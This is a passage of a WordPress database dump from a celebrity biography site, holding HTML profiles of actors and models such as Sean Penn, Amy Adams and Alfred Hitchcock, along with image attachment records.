Victoria’s Secret and appearances in Vogue, a fashion magazine. She enrolled high school at Aptos High and later transferred to Monte Vista School. Marisa considered herself to be a tomboy as she grew up with mostly male friends. Out of the shyness she had, she loved to wear large T-shirts and would even get fully dressed when going at the beach.\r\n\r\nMarisa Miller was first discovered by two modeling agents based in Italy when she was only 6. After discussing with her mother about trying modeling as a career, she was happy to be on a plane to Italy several months later, where she hoped to make a good name for herself. Despite her conservative and shyness personality, Marisa gained a lot of attention, especially when she appeared in Perfect 10 Magazine in 1997. Since then she was repeatedly showcased in many editions, including the cover of August 1999 edition.\r\n<h2>Career Accomplishment</h2>\r\nMarisa started as an amateur model to high-profile work when an acquaintance showcased pictures of her to Marino Testino, a famed fashion photographer. In 2001, Marino requested to meet Miller, setting up a meeting at Manhattan Beach, California. She was offered a job of editorials for Italian and American Vogue editions. Within a period of six months, Marisa was working for the coveted issue of <a href=\"http://www.people.com/people/article/0,,20781818,00.html\" target=\"_blank\">Sport Illustrated Swimsuit</a> as well as Victoria Secret, in which she was featured from 2002-2008. More work followed and she was offered jobs to work with international editions like Vanity Fair, Marie Claire, Elle, Glamour and Maxim. She was also featured in advertisements such as Bath True Religion jeans, Body Works, and Nordstrom.\r\n\r\nIn 2007, Marisa was featured in her first TV commercial, appearing alongside the famous Heidi Klum. On December that same year, she made her debut in Fashion Show by Victoria Secret, and went ahead to open a segment in following edition. She has done runway work with big fashion agencies such as Fashion for Relief, Fashionably Loud and Imitation for Christ, for which she was the most anticipated model. Beyond modeling, Marisa Miller stated in an interview with Forbes that supermodels have to try their best and become brands in order to be successful, mostly because <a href=\"http://birthdaypedia.com/giorgio-armani/\">fashion industry</a> has changed and only celebrity models are being featured in campaigns.\r\n<h2>Most Know For</h2>\r\nMarisa Miller is an <a href=\"http://birthdaypedia.com/cher/\">American actress</a> and model best known for her work with Victoria’s Secret as well as appearances in the Issue of Sports Illustrated. Her career accomplishments in the U.S. and other regions have led her being called “return of the great supermodel.”\r\n<h2>Current Personal Life</h2>\r\nMarisa married a lifeguard and surfing contest promoter, Jim Miller, in 2000, but the couple later divorced in 2002. Four years later, she married Griffin Guess, a music producer, with whom she had a child, Gavin Lee Guess. In 2015, Marisa participated in a campaign known as PETA against SeaWorld, which saw her go naked while pregnant. She gave birth to her second child, Grayson Lee Bazyl, on May 29.\r\n<h2>Where is she now</h2>\r\nCurrently, Marisa Miller lives with her husband and two children in the city of Santa Cruz, California. She is still active in modeling and other ventures, trying to make her own brand.\r\n\r\n[<a href=\"https://www.flickr.com/photos/proimos/3472468733/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Marisa Miller ','','publish','open','open','','marisa-miller','','','2015-10-14 14:10:25','2015-10-14 14:10:25','',0,'http://birthdaypedia.com/?p=203',0,'post','',0),(206,2,'2015-08-11 20:41:49','2015-08-11 20:41:49','','Nicole Evangeline Lilly','','inherit','open','open','','nicole-evangeline-lilly','','','2015-08-11 20:42:48','2015-08-11 20:42:48','',201,'http://birthdaypedia.com/wp-content/uploads/2015/08/Nicole-Evangeline-Lilly.jpg',0,'attachment','image/jpeg',0),(207,2,'2015-08-11 20:48:52','2015-08-11 20:48:52','','Barack Obama','','inherit','open','open','','barack-obama','','','2015-08-11 20:49:11','2015-08-11 20:49:11','',199,'http://birthdaypedia.com/wp-content/uploads/2015/08/Barack-Obama.jpg',0,'attachment','image/jpeg',0),(208,2,'2015-08-11 20:57:01','2015-08-11 20:57:01','','Jessica Nigri','','inherit','open','open','','jessica-nigri','','','2015-08-11 20:57:05','2015-08-11 20:57:05','',202,'http://birthdaypedia.com/wp-content/uploads/2015/08/Jessica-Nigri.jpg',0,'attachment','image/jpeg',0),(209,2,'2015-08-11 21:04:13','2015-08-11 21:04:13','','Marisa Miller ','','inherit','open','open','','marisa-miller','','','2015-08-11 21:04:22','2015-08-11 21:04:22','',203,'http://birthdaypedia.com/wp-content/uploads/2015/08/Marisa-Miller-.jpg',0,'attachment','image/jpeg',0),(210,2,'2015-08-11 21:42:58','2015-08-11 21:42:58','','Charlize Theron','','inherit','open','open','','charlize-theron','','','2015-08-11 21:52:35','2015-08-11 21:52:35','',200,'http://birthdaypedia.com/wp-content/uploads/2015/08/Charlize-Theron.jpg',0,'attachment','image/jpeg',0),(211,2,'2015-08-17 08:32:19','2015-08-17 08:32:19','<h2>In the Beginning</h2>\r\nSean Justin Penn was born on August 17, 1960 in Los Angeles, California. Penn is the son of actor Leo Penn and actress Eileen Ryan. Penn is of Jewish, Irish and Italian descent, and was raised in a secular home in <a href=\"https://en.wikipedia.org/wiki/Santa_Monica,_California\" target=\"_blank\">Santa Monica</a>. He was childhood friends with Emilio Estevez and Charlie Sheen, and he began making short films with them for fun at an early age.\r\n<h2>Career Accomplishments</h2>\r\nPenn appeared first on “L<a href=\"https://en.wikipedia.org/wiki/Little_House_on_the_Prairie_(TV_series)\" target=\"_blank\">ittle House on the Prairie</a>” at 14 years of age, and thus began his official acting career. In 1982, he had his first big role in a major motion picture called “Fast Times at Ridgemont High”. He would play leading roles over the next several years that would get him several nominations for Academy Awards - “Dead Man Walking”, “I Am Sam”, “Mystic River” and “<a href=\"http://www.rogerebert.com/reviews/milk\" target=\"_blank\">Milk</a>”.\r\n\r\nThough not as predominant as his acting career, Penn has also directed a few films over the years, as well as a couple music videos. Each film Penn directed has been well received by critics.\r\n\r\nPenn has also made a name for himself in the political world, and has dedicated and purposed much of his work into supporting the Democratic Party, Cuba\'s president Raul Castro, and speaking out against the George W. Bush administration.\r\n<h2>Most Known For</h2>\r\nPenn is most known for the films that earned him two Academy Awards. He won Best Actor for the Boston Crime drama Mystic River in 2003, and in 2008, he won the same award again for “Milk”- which was a portrayal of real-life gay-rights icon and politician Harvey Milk.\r\n<h2>Current Personal Life</h2>\r\nPenn has most recently dated actress <a href=\"http://birthdaypedia.com/charlize-theron/\">Charlize Theron</a>, though there\'s been no recent remark on the status of their relationship. He was married twice, in the 1980\'s to Madonna, and until 2010 to actress Robin Wright. He and Wright have two kids together, Dylan Frances (born in 1991) and Hopper Jack (born in 1993). He is very well known for his personal endeavors in politics, having written an open letter to George W. Bush in 2002 via the Washington Post.\r\n<h2>Where Are They Now</h2>\r\nPenn currently lives in California as he continues to pursue acting. He has most recently acted in the 2015 movie, “The Gunman”.\r\n\r\n<a href=\"https://www.flickr.com/photos/96739999@N05/14418572969/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Sean Penn','','publish','open','open','','sean-penn','','','2015-10-14 20:39:50','2015-10-14 20:39:50','',0,'http://birthdaypedia.com/?p=211',0,'post','',0),(212,2,'2015-08-18 08:32:22','2015-08-18 08:32:22','<h3>In the Beginning</h3>\r\nEdward Harrison Norton was more in <a href=\"https://en.wikipedia.org/wiki/Boston\" target=\"_blank\">Boston, Massachusetts</a> on August 18, 1969. His parents raised he and his younger siblings in Columbia Maryland. His father was an environmental lawyer, and his Mother was an English teacher before she died in 1997. Norton attended Camp Pasquaney from 1981-1985, where he won the acting cup and remains to be in close contact as a strong supporter.\r\n\r\nNorton attended and graduated from <a href=\"http://www.yale.edu/\" target=\"_blank\">Yale University</a> with a Bachelor of Arts in History. After graduation, he worked for his grandfathers consulting company in Japan before moving to New York City to star in the Off-Broadway theater production, “Fragments”.\r\n<h3>Career Accomplishments</h3>\r\nNorton made his <a href=\"http://www.imdb.com/name/nm0001570/\" target=\"_blank\">film</a> debut with the movie “Primal Fear”, in which he was given mixed reviews – mostly praising his acting performance but criticizing the film. A couple of years later, he turned heads with his performance as a neo-nazi in “American History X”. Over the next several years, he would solidify his status as one of the greatest actors today by giving stellar performances in each movie he participated in - “Rounders”, “Fight Club”, “Red Dragon”, “25<sup>th</sup> Hour”, “The Incredible Hulk”, “The Illusionist”, “The Painted Veil”, and many others.\r\n\r\nMost recently, Norton starred in the comedy film “Birdman”, which received phenomenal reviews and won several awards.\r\n<h3>Most Known For</h3>\r\nNorton has been nominated for three Academy Awards for his work in the films “Primal Fear”, “American History X” and most recently, “Birdman”. Norton is also very well known for the film “Fight Club”, in which he plays a washed up middle class man who\'s sick of a boring life. He played alongside Brad Pitt for this role, and trained extensively in boxing, taekwondo and grappling. The movie itself flopped at the box office, but became an instant classic with the release on DVD, and has since been called by Empire Magazine “One of the 500 Greatest Movies of All Time”.\r\n<h3>Current Personal Life</h3>\r\nNorton dated film producer <a href=\"https://en.wikipedia.org/wiki/Shauna_Robertson\" target=\"_blank\">Shauna Robertson</a> for several years, and they married in 2012. They have one son, Atlas, who was born in March 2013. Norton seeks to be a normal, down to earth guy, reluctant to embrace his celebrity status and eager to be involved in social activism for several non-profits. His activist work has targeted improving the quality of low income communities and supporting renewable energy projects.\r\n\r\nHe\'s stated that he is an avid Baltimore Orioles fan, and has participated in many of their events and activities, specifically surrounding the retirement of Cal Ripken Jr. Norton also has his pilot\'s license, and enjoys flying in his spare time.\r\n<h3>Where Are They Now</h3>\r\nNorton continues to give stellar performances with his acting career and is currently working on a project called “Sausage Party”, set to be released in 2016.\r\n\r\n<a href=\"https://www.flickr.com/photos/unitednationsdevelopmentprogramme/7414051026/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Edward Norton','','publish','open','open','','edward-norton','','','2017-06-20 16:08:49','2017-06-20 16:08:49','',0,'http://birthdaypedia.com/?p=212',0,'post','',0),(213,2,'2015-08-19 09:32:24','2015-08-19 09:32:24','<h3>In the Beginning</h3>\r\nGerald Lee McRaney was born on August 19, 1947 in <a href=\"https://en.wikipedia.org/wiki/Collins,_Mississippi\" target=\"_blank\">Collins, Mississippi</a>. His father was a builder, and McRaney is of Scottish and Choctaw ancestry. Raised in Mississippi, McRaney attended the University of Mississippi before working in the Louisiana oil fields for several years.\r\n<h3>Career Accomplishments</h3>\r\nMcRaney broke out of traditional work in an oil field and into the acting business when he starred in “Night of Bloody Horror” in 1969. This movie was a low budget slasher film that hardly received any attention, but acted as a launch pad for McRaney for the remainder of his career.\r\n\r\nHe participated in “Dukes of Hazzard”, a couple episodes of “The Rockford Files”, and an episode of “Hawaii Five-O” before becoming a longer term member of the TV series “Roots: The Next Generations” and “Simon & Simon”. He also had leading roles on “Major Dad”, “Promised Land”, “The West Wing”, “Deadwood”, and “Jericho”. He\'s made several guest appearances on TV shows, and most recently has appeared consistently in the Netflix series, “House of Cards”.\r\n<h3>Most Known For</h3>\r\nThough you\'ve likely seen him often on several well known TV shows, he\'s most known for his work as Rick Simon in the 1980\'s television show, “<a href=\"http://www.imdb.com/title/tt0081930/\" target=\"_blank\">Simon & Simon</a>”. His appearance in “House of Cards” is the freshest and most well known work today for McRaney.\r\n<h3>Current Personal Life</h3>\r\nThough he\'s been married and divorced a few times, he is currently married to actress Delta Burke (since 1989). The two met on the set of Simon & Simon. McRaney is a openly conservative Republican who supports the <a href=\"http://home.nra.org/\" target=\"_blank\">National Rifle Association</a> and has made well known his support of Veterans and Soldiers.\r\n\r\nMcRaney has been through ups and downs with his health. Most recently, in 2004, he underwent surgery in Texas for lung cancer.\r\n<h3>Where Are They Now</h3>\r\nMcRaney and his wife are actively filming and promoting their work and efforts on the road, but whenever they can they return to the South. They share a home in New Orleans that they enjoy spending time at, and they have a home on the Pearl River.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Gerald_McRaney.jpg\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Gerald McRaney','','publish','open','open','','gerald-mcraney','','','2017-06-20 16:09:35','2017-06-20 16:09:35','',0,'http://birthdaypedia.com/?p=213',0,'post','',0),(214,2,'2015-08-20 09:11:26','2015-08-20 09:11:26','<h3>In the Beginning</h3>\r\nAmy Lou Adams was born in <a href=\"http://www.venice-italy-veneto.com/\" target=\"_blank\">Veneto, Italy</a>, and was the fourth of seven children to her American parents. Her father is a US Army veteran and was stationed nearby in Italy at the time of her birth. The Adams family settled back in the states in Colorado when she was just 8 years old. Raised in the Church of Latter Day Saints, Adams claims to have been instilled with a value system that commands the Golden Rule and respect.\r\n\r\nIn high school, Adams was gearing up to become a ballerina as she trained at a local dance company. At 18, she made the decision not to go to college. Rather, she moved to Atlanta with her mother to pursue a career as a ballerina. Ultimately, Adams realized that a career in Musical theater was more suited to her lifestyle and talent. While she pursued a career in theater, she supported herself by working at Gap and hostessing (briefly) at a Hooters.\r\n<h3>Career Accomplishments</h3>\r\nAdams launched her career in dinner theater until 1999, when she auditioned for a satirical comedy, “Drop Dead Gorgeous”. Shortly after starring in the film, Adams moved to Los Angeles and appeared on several series, such as, “That 70\'s Show”, “Charmed”, “The Office”, “Buffy the Vampire Slayer” and “The West Wing”.\r\n\r\nSoon after, her film career took off as she was cast for a leading role alongside Leonardo DiCaprio in “Catch Me If You Can”. Though it was a huge role for Adams, she remained unemployed for the following year. She still considers this role as the biggest confidence booster for her, however, and credits it for some of the (delayed) success that would follow.\r\n\r\nA few years later, Adams decided to take the leading role in a low budget film called “Junebug”; Adams won several awards for her performance in the movie, and was nominated for a Screen Actors Guild Award and an Academy Award.\r\n\r\nDisney film “<a href=\"http://www.imdb.com/title/tt0461770/\" target=\"_blank\">Enchanted</a>” would be the next big film for Adams, and was a major commercial success for the actress.\r\n\r\nIn 2008, Adams starred in “Doubt” alongside Meryl Streep, and was nominated for Best Supporting Actress at several big Award Shows for the following year.\r\n\r\nIn 2010, Adams won awards for her performance in the movie “Fighter” alongside Mark Wahlberg, Christian Bale and Melissa Leo. This movie was a turning point for Adams, as she was cast as a more gruff, less “Princess-y” part than her previous roles.\r\n\r\nMost recently, Adams portrayed Lois Lane in “Man of Steel”, and played alongside Christian Bale, Anderson Cooper and Jennifer Lawrence in “American Hustle”.\r\n\r\nIn 2014, Adams was named by Time Magazine as one of 100 Most Influential People.\r\n<h3>Most Known For</h3>\r\nThough she got a seemingly slow start to her acting career, Adam\'s supporting Oscar nominations, Golden Globe Awards, Academy Award and BAFTA nominations indicate that her work is very well known today. Specifically, “Junebug”, “Doubt”, “The Fighter” and “Enchanted” have earned her quite a seat among the best actresses today.\r\n<h3>Current Personal Life</h3>\r\nAdams began dating actor <a href=\"http://www.imdb.com/name/nm1098160/\" target=\"_blank\">Darren Le Gallo</a> in 2001, and they married in May 2015. The couple has a daughter together, who was born in 2010.\r\n<h3>Where Are They Now</h3>\r\nAdams currently lives with her husband and daughter and continues to impress the nation with her acting career.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Amy_Adams_speaking_at_the_2015_San_Diego_Comic-Con_International.jpg\" target=\"_blank\">Image Credit </a>\r\n\r\n ','Amy Adams','','publish','open','open','','amy-adams','','','2017-06-20 16:08:48','2017-06-20 16:08:48','',0,'http://birthdaypedia.com/?p=214',0,'post','',0),(215,2,'2015-08-21 07:32:27','2015-08-21 07:32:27','<h3>In the Beginning</h3>\r\nA New York native, Hayden Panettiere was born and raised in <a href=\"https://en.wikipedia.org/wiki/Palisades,_New_York\" target=\"_blank\">Palisades, New York</a>. She\'s the daughter of a former soap opera actress and fire captain. She is over Italian and German ancestry, and she has family that lives in Indiana. Panettiere attended a public middle school in New York, but due to her acting career, she was homeschooled for all of high school. By that time, her acting career was underway tremendously, and Panettiere did not go to college.\r\n<h3>Career Accomplishments</h3>\r\nPanettiere appeared on set for the first time at 11 months old, in a commercial for a Playskool toy. Several years later, at age 5, she starred in “One Life to Live”. At age 10, she played Coach Yoast\'s daughter in the Disney film “Remember the Titans”. She had other roles along the way for which she received praise, including playing an adolescent teen alongside <a href=\"http://www.imdb.com/name/nm0005028/\" target=\"_blank\">Kate Hudson</a> in “Raising Helen”.\r\n\r\nAs a young child and teen, Panettiere made appearances in several well known TV shows, such as “Malcolm in the Middle”, “Law & Order: SVU”, and “Ally McBeal”.\r\n\r\nShe received praise for her portrayal of Amanda Knox in the real crime drama, “Amanda Knox: Murder on trial in Italy”, and for her role in “Scream 4”.\r\n\r\nPanettiere is also known for her <a href=\"http://hollywoodlife.com/2014/03/05/hayden-panettiere-wedding-dress-brides-magazine-cover-interview/\" target=\"_blank\">modeling career</a>, specifically as the face for Neutrogena as of 2006.\r\n<h3>Most Known For</h3>\r\nPanettiere is most known for her role as Claire Bennet on the NBC series “Heroes”, and for her role playing Juliette Barnes in the ABC Musical Drama “Nashville”. She received two Golden Globe Nominations for her work in “Nashville”, in which she stars in alongside actress Connie Britton.\r\n<h3>Current Personal Life</h3>\r\nPanettiere dated actor Milo Ventimiglia for 2 years after meeting on set at their show, “Heroes”. However, soon after the couple split, Panettiere began dating heavyweight boxing world champion Wladimir Klitschko; the couple split after about a year of dating because of the nature of the long distance relationship, and that it was just hard to maintain. Since then, she briefly dated NFL player <a href=\"https://en.wikipedia.org/wiki/Scotty_McKnight\" target=\"_blank\">Scotty McKnight</a> before reconciling with Klitschko and giving birth to their daughter in December 2014.\r\n\r\nPanettiere has made her political status known with intentions of supporting President Barack Obama. She\'s also raised awareness and support for several “Save the Whales” projects. <em> </em>\r\n<h3>Where Are They Now</h3>\r\nPanettiere continues to film the hit series “Nashville”, which is filmed in the city itself where she resides.\r\n\r\n<a href=\"https://www.flickr.com/photos/sunrise7/3402494629/sizes/o/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Hayden Panettiere','','publish','open','open','','hayden-panettiere','','','2017-06-20 16:09:45','2017-06-20 16:09:45','',0,'http://birthdaypedia.com/?p=215',0,'post','',0),(216,2,'2015-08-13 18:45:22','2015-08-13 18:45:22','','Sean Penn','','inherit','open','open','','sean-penn','','','2015-08-13 18:46:29','2015-08-13 18:46:29','',211,'http://birthdaypedia.com/wp-content/uploads/2015/08/Sean-Penn.jpg',0,'attachment','image/jpeg',0),(217,2,'2015-08-10 08:57:09','2015-08-10 08:57:09','<h2>In the Beginning</h2>\r\nJose Antonio Dominguez Banderas was born in <a href=\"https://en.wikipedia.org/wiki/Andalusia\" target=\"_blank\">Andalucia, Spain</a> on August 10, 1960. Banderas grew up the son of a school teacher and a police officer, with a little brother named Javier. Soccer was his sport of choice, and a main focus for him growing up until he injured his foot at the age of 14. From that point on, he turned his focus to performing arts, and tried his hand at theater. Eventually, as a young teen, Banderas caught the eye of recruiters with the Spanish National Theatre, and thus began his acting career.\r\n<h2>Career Accomplishments</h2>\r\nThe 1980\'s held many small victories for the actor as he launched his career with the Spanish National Theatre, but it wasn\'t until his role in “Tie Me Up! Tie Me Down!” that he was able to gain the attention of his Hollywood cohorts. Just a few years later, he was sharing the screen with huge American names, such as <a href=\"http://birthdaypedia.com/tom-hanks/\">Tom Hanks</a> in “Philadelphia”, and Brad Pitt in “Interview with the Vampire”.\r\n\r\n<strong> </strong>Other notable performances include “1995”, “Desperado”, “Assassins”, “Spy Kids”, “Original Sin”, “Once Upon a Time in Mexico”, the “Zorro” Movies, and most recently, “Puss in Boots”.\r\n<h2>Most Known For</h2>\r\nThough Banderas has clearly made a name for himself as one of the most established actors in Hollywood, there are certain films that he is most known for in mainstream America. “The Mask of Zorro” kept him in the spot light for quite some time, and is one of the most famous leading roles that he\'s played to date. The success of the film lead to a series of “Zorro” films, and remains one of his most well known performances.\r\n\r\nBanderas gained the attention of much younger audiences when he played the voice of “Puss in Boots” in “Shrek 2”, “Shrek the Third” and “Shrek Forever After” – so much so, that a movie was created around the character himself, the self named “Puss in Boots” movie.\r\n<h2>Current Personal Life</h2>\r\nBanderas married his second wife, actress <a href=\"http://www.imdb.com/name/nm0000429/bio\" target=\"_blank\">Melanie Griffith</a>, on May 14, 1996 in London. The two have a daughter named Stella, and while together did a sizable amount of philanthropic work for charity. In June of 2014, the couple released statements announcing they were going to part ways, although peacefully, because of irreconcilable differences.\r\n<h2>Where Are They Now</h2>\r\nAntonio Banderas continues to light up the big screen with stellar performances, and resides in his home in Los Angeles, California.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:AntonioBandaresJune07.jpg\" target=\"_blank\">Image Credit </a>\r\n\r\n ','Antonio Banderas','','publish','open','open','','antonio-banderas','','','2015-10-14 18:44:29','2015-10-14 18:44:29','',0,'http://birthdaypedia.com/?p=217',0,'post','',0),(218,2,'2015-08-11 07:57:10','2015-08-11 07:57:10','<h2>In the Beginning</h2>\r\nAlyson Stoner was born in <a href=\"http://toledo.oh.gov/\" target=\"_blank\">Toledo, Ohio</a> on August 11, 1993. Her mother, LuAnne Hodges, was a former executive secretary at Owens-Illinois. Growing up, Stoner studied and performed in ballet, tap dance and jazz, and modeled and trained at a local Modeling Studio. Early on in her life, she won awards that led the way for a successful future on the screen – Best Model of the Year at the <a href=\"http://www.imta.com/\" target=\"_blank\">International Modeling and Talent Association</a> being the most prestigious.\r\n<h2>Career Accomplishments</h2>\r\nDisney picked Stoner up at just 8 years old, as she became the co-host of “Mike\'s Super Short Show”. Beyond that, she appeared in “Cheaper By the Dozen” and its sequel alongside actor Steve Martin. She\'s also made several appearances in other pre-teen shows, such as “The Suite Life of Zack & Cody”, “That\'s So Raven” and “Drake & Josh”.\r\n\r\nShe eased into the world of music when her lead character role in “Alice Upside Down” sang two songs. In 2011, she began working with trained professionals to develop her voice into more of an adult pop sound. She released her first album, entitled “Beat the System” later that year.\r\n\r\nIf you haven\'t seen Stoner on the screen or heard her singing on the radio, you\'ve likely seen her as a back up dancer alongside one of many famous artists – Missy Elliot, Eminem, OutKast and Will Smith all enlisted her as a performer.\r\n<h2>Most Known For</h2>\r\nThough she\'s young in the industry, Stoner has started with quite a bang in that each of her performances has been notable, and she\'s grown into new and more developed roles with each passing year. “The Suite Life of Zack & Cody” have been a predominant attention getter for Stoner, and ultimately led to her getting the leading role in “Alice Upside Down”, which has been the other big movie for her.\r\n<h2>Current Personal Life</h2>\r\nStoner keeps a low profile and appears to focus most of her time and energy on her professional development, as she has pursued many ventures since the start of her career. She\'s rumored to be single, but declines to ever comment on any relationship status.\r\n<h2>Where Are They Now</h2>\r\nShe currently resides in Los Angeles, California, where she continues to develop her career in acting, singing and choreography. She also has a home in Toledo, where her family is.\r\n\r\n<a href=\"https://www.flickr.com/photos/insidethemagic/5538885680/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Alyson Stoner','','publish','open','open','','alyson-stoner','','','2015-10-14 14:12:52','2015-10-14 14:12:52','',0,'http://birthdaypedia.com/?p=218',0,'post','',0),(219,2,'2015-08-12 09:57:12','2015-08-12 09:57:12','<h2>In the Beginning</h2>\r\nCara Delevingne was born in <a href=\"http://www.lonelyplanet.com/england/london\" target=\"_blank\">London, England</a> on August 12, 1992. Delevingne had two older sisters, and attended a private school for girls until age 16. She began modeling at age 10, when she was featured in an editorial shoot for Vogue Italia. Seven years later, she was discovered by the founder of <a href=\"http://www.stormmanagement.com/\" target=\"_blank\">Storm Model Management</a>, and thrust into a full fledged modeling career.\r\n<h2>Career Accomplishments</h2>\r\nSarah Doukas is the one who first spotted Delevingne, and who helped her to launch her career quickly. By early 2011, Delevingne was participating in Burberry\'s campaign; later in the year she would do her first catwalk appearance for Burberry.\r\n\r\nSince then, she\'s been featured in ads for H&M, DKNY, Tom Ford, Yves Saint Laurent and Chanel. In addition, she\'s appeared on the catwalk to Jason Wu, Oscar de la Renta, Dolce & Gabbana, Fendi, Givenchy, Chanel, and many more. In 2012 and 2013, she participated as a model in the infamous <a href=\"http://www.cbs.com/shows/victorias_secret/\" target=\"_blank\">Victoria\'s Secret Fashion show</a>. She\'s been on the cover of <a href=\"http://www.vogue.com/magazine/\" target=\"_blank\">Vogue</a> in the UK three times, and has been named recently as the brand ambassador of the watch brand TAG Heuer.\r\n\r\nIt\'s been confirmed that Delevingne has cut ties with her modeling agency, Storm, and is choosing to now focus on her acting career – which launched as she played Princess Sorokina in “Anna Karenina”, alongside Keira Knightley in 2012. Such a move gained her a feature (and the cover) of American Vogue. Since then, she\'s been in several “B movies” and has been commended for her acting performances, though the movies themselves have been lacking.\r\n<h2>Most Known For</h2>\r\nThough she\'s launching her acting career now so we\'re sure to see her more, currently Delevingne is most well known for her career as a model. Her face has undoubtably been seen in Burberry\'s and Dolce & Gabbana\'s ad campaigns numerous times as the “face” of those brands.\r\n<h2>Current Personal Life</h2>\r\nThe model and actress claims to identify as bisexual. In June 2015, she confirmed that she is in a relationship with American musician <a href=\"http://www.celebuzz.com/2015-06-19/cara-delevingne-love-girlfriend-annie-clark-st-vincent-vogue/\" target=\"_blank\">Annie Clark</a>.\r\n<h2>Where Are They Now</h2>\r\nIt is rumored that Delevingne continues to live with her parents outside of London in between traveling the world for her new acting career, and as she pursues certain modeling ventures.\r\n\r\n<a href=\"https://www.flickr.com/photos/tonyshek/15126955167/sizes/z/\" target=\"_blank\">Image Credit</a>','Cara Delevingne','','publish','open','open','','cara-delevingne','','','2015-10-14 14:13:21','2015-10-14 14:13:21','',0,'http://birthdaypedia.com/?p=219',0,'post','',0),(220,2,'2015-08-13 07:43:13','2015-08-13 07:43:13','<h2>In the Beginning</h2>\r\nAlfred Joseph Hitchcock was born August 13, 1899 in <a href=\"https://en.wikipedia.org/wiki/Essex\" target=\"_blank\">Essex, England</a>. Hitchcock was raised in a far from idyllic manner, and described his childhood as lonely and sheltered – in part due to his obesity. He was scarred for life as a child when his father sent him to the police station with a note asking the officer to lock him away for five minutes for behaving badly. Hitchcock, from that point on, had an irrational fear of policemen. The harsh treatment would also stick in his mind throughout his lifetime, as we would come to see as themes in his films.\r\n\r\nShortly after his father died and at age 15, Hitchcock attempted to enter the military service but was ultimately rejected because of his weight. His creative future soon followed.\r\n<h2>Career Accomplishments</h2>\r\nHitchcock dabbled with writing initially at the Henley Telegraph, and his first article was about a young woman who imagines that she\'s being assaulted, though a twist reveals she was only hallucinating at the dentists office. A few years and many articles later, Hitchcock became enthralled with photography, and started working in film production. He rose from title designer to film director, from screen writer to art director and assistant director in a matter of years. By 1922, he began directing his own projects, the first of which was called “Number 13”. It wasn\'t until his first thriller, called, “<a href=\"https://en.wikipedia.org/wiki/The_Lodger:_A_Story_of_the_London_Fog\" target=\"_blank\">The Lodger: A Story of the London Fog</a>” in 1927 that Hitchcock began to make a name for himself.\r\n\r\nIn 1929, Hitchcock\'s tenth film in progress was converted to sound, and thus began Hitchcock\'s string of infamous “talkies”. In 1939, Hitchcock signed a seven year contract with a Hollywood producer and really etched a name for himself internationally as a brilliant suspense and thriller film director with movies like “Rebecca”, which won an Academy Award for Best Picture of 1940. Hitchcock moved on to sign with Universal a number of years later, and made two films with them during the 1940\'s. It was in 1943 that Hitchcock directed his personal favorite film – Shadow of Doubt.\r\n\r\nDuring World War II, Hitchcock made short propaganda films and served as “treatment advisor” in a documentary on the Holocaust.\r\n<h2>Most Known For</h2>\r\nHitchcock hit his peak in the 1950\'s when he filmed “Stage Fright” in England. He cast some of the decades most popular actors for this film, including Jane Wyman, Marlene Dietrich, Michael Wilding, Richard Todd and Alastair Sim.\r\n\r\nHitchcock\'s film “Vertigo” was ironically was not appreciated in its time. Back then, it met with negative reviews, but today it is considered a classic and “one of the best films ever”.\r\n\r\nWithout question, Hitchcock\'s most famous work is 1960\'s “<a href=\"http://www.imdb.com/title/tt0054215/\" target=\"_blank\">Psycho</a>”. Such scenes in “Psycho” are well known and replicated to this day: the violence of the shower scene, the early death of the protagonist, and the gruesome and disturbed horror presented throughout.\r\n<h2>Current Personal Life and Where They Are Now</h2>\r\nHitchcock died at the age of 80 at his home in Bel Air. He passed early in the morning of renal failure, and left behind his wife and daughter. His body was cremated and his remains were scattered over the Pacific Ocean on May 10 of 1980. <em> </em>\r\n\r\n<a href=\"https://www.flickr.com/photos/mar1lyn84/6124026122/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Alfred Hitchcock','','publish','open','open','','alfred-hitchcock','','','2015-10-14 14:14:03','2015-10-14 14:14:03','',0,'http://birthdaypedia.com/?p=220',0,'post','',0),(221,2,'2015-08-14 08:21:16','2015-08-14 08:21:16','<h2>In the Beginning</h2>\r\nMila Kunis was born on August 14, 1983 in the <a href=\"https://en.wikipedia.org/wiki/Ukraine\" target=\"_blank\">Ukrainian</a> SSR. Her parents had great jobs and Kunis was raised in a somewhat wealthy home, but in 1991 her family moved to Los Angeles, California to pursue opportunities for her and her brother. In the United States, the Kunis family was free to practice their Jewish traditions and pursue their passions, although the transition from one culture to another was anything but easy on the family.\r\n\r\nKunis adapted to the lifestyle of an actress after her middle school years, and used an on-set tutor for her high school years on the set of “<a href=\"http://www.imdb.com/title/tt0165598/\" target=\"_blank\">That \'70\'s Show</a>”.\r\n<h2>Career Accomplishments</h2>\r\nQuickly after the family moved to the States, Kunis\'s father enrolled her in acting classes in Beverly Hills. Over the next years, she landed a role for a Barbie commercial, she did a commercial for the Lisa Frank product line, she appeared on Days of Our Lives, and she made her first two appearances on Baywatch. She had minor roles in other small films and series.\r\n\r\n<strong> </strong>Her biggest break came in 1998, when Kunis was cast as a leading role in the hit series “That 70\'s Show”. She transitioned to film in 2001, and since then has been in huge hits alongside big names – “Get Over It” with Kirsten Dunst led the way. In 2008, she starred in Judd Apatow\'s film “Forgetting Sarah Marshall”, another leap forward for the young actress. In 2010, she starred in “Black Swan” alongside <a href=\"https://en.wikipedia.org/wiki/Natalie_Portman\" target=\"_blank\">Natalie Portman</a>; the film was nominated for five Academy Awards, including Best Picture.\r\n<h2>Most Known For</h2>\r\n<strong> </strong>She\'s been in several Hollywood hits since, but “That 70\'s Show” is where she got her start, and where most know her from. She starred alongside Ashton Kutcher in the 10 year series that launched her into other well known productions soon after the series ended.\r\n<h2>Current Personal Life</h2>\r\nKunis has made quite a name for herself in regards to her personal life. She\'s been vocal about her opinions, political and otherwise, and has let the nation know about her liberal stance as an avid supporter of the Democratic Party and <a href=\"http://birthdaypedia.com/barack-obama/\">Barack Obama</a>.\r\n\r\nShe began dating her “That 70\'s Show” co-star Ashton Kutcher in 2012. Since then, the two have had a baby together – Wyatt Isabelle, and got married in 